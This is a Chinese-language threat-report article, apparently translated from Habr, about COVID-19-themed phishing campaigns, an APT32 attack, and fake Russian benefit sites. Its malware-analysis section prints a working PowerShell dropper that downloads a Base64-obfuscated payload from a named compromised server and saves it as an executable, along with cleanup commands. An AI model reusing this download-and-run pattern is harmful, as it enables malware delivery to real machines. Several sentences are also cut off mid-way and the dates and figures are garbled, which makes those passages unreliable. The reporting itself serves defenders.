攻击者继续利用 COVID-19 主题,为对与该流行病相关的一切都非常感兴趣的用户制造越来越多的威胁。 在
记得在
您想要免费检测 COVID-19 吗?
以冠状病毒为主题的网络钓鱼的另一个重要例子是
说服大多数用户启用宏也很容易。 为此,使用了一个标准技巧:要填写调查问卷,您首先需要启用宏,这意味着您需要运行 VBA 脚本。
正如您所看到的,VBA 脚本经过专门屏蔽,免受防病毒软件的攻击。
Windows 有一个等待功能,应用程序在接受默认的“是”答案之前等待 /T <秒>。 在我们的例子中,脚本在删除临时文件之前等待了 65 秒:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
在等待期间,恶意软件被下载。 为此启动了一个特殊的 PowerShell 脚本:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
解码 Base64 值后,PowerShell 脚本会下载位于先前被黑客入侵的德国 Web 服务器上的后门:
http://automatischer-staubsauger.com/feature/777777.png
并将其保存在名称下:
C:UsersPublictmpdirfile1.exe
夹 ‘C:UsersPublictmpdir’
运行包含该命令的“tmps1.bat”文件时被删除 cmd /c mkdir ""C:UsersPublictmpdir"".
针对政府机构的针对性攻击
此外,FireEye 分析师最近报告了针对武汉政府机构以及中国应急管理部的 APT32 攻击。 其中一份分发的 RTF 包含纽约时报文章的链接,标题为
有趣的是,根据 Virustotal 的说法,在检测时,没有任何防病毒软件检测到此实例。
当官方网站瘫痪时
网络钓鱼攻击最引人注目的例子就在前几天发生在俄罗斯。 原因是为 3 至 16 岁儿童指定了一项期待已久的福利。 当 12 年 2020 月 XNUMX 日宣布开始接受申请时,数百万人涌向国家服务网站寻求期待已久的帮助,并导致该门户网站瘫痪,其严重程度不亚于专业的 DDoS 攻击。 当总统说“政府服务无法应对申请流程”时,人们开始在网上讨论推出另一个接受申请的网站。
问题是,几个网站同时开始工作,而真正的网站 posobie16.gosuslugi.ru 实际上接受申请,但更多
SearchInform 的同事在 .ru 区域中发现了大约 30 个新的欺诈域名。 自70月初以来,Infosecurity和Softline Company已追踪到16多个类似的虚假政府服务网站。 它们的创作者使用了熟悉的符号,还使用了 gosuslugi、gosuslugi-XNUMX、vyplaty、covid-vyplaty、posobie 等单词的组合。
炒作和社会工程
所有这些例子都只能证实攻击者正在成功地利用冠状病毒主题获利。 社会紧张程度越高,问题越不明确,诈骗者窃取重要数据、迫使人们自己放弃金钱或干脆入侵更多计算机的机会就越大。
鉴于疫情迫使可能毫无准备的人们集体在家工作,不仅个人数据,而且公司数据都面临风险。 例如,最近Microsoft 365(以前称为Office 365)用户也遭受了网络钓鱼攻击。 人们收到大量“错过”的语音信息作为信件的附件。 然而,这些文件实际上是一个 HTML 页面,将攻击的受害者发送到
来源: habr.com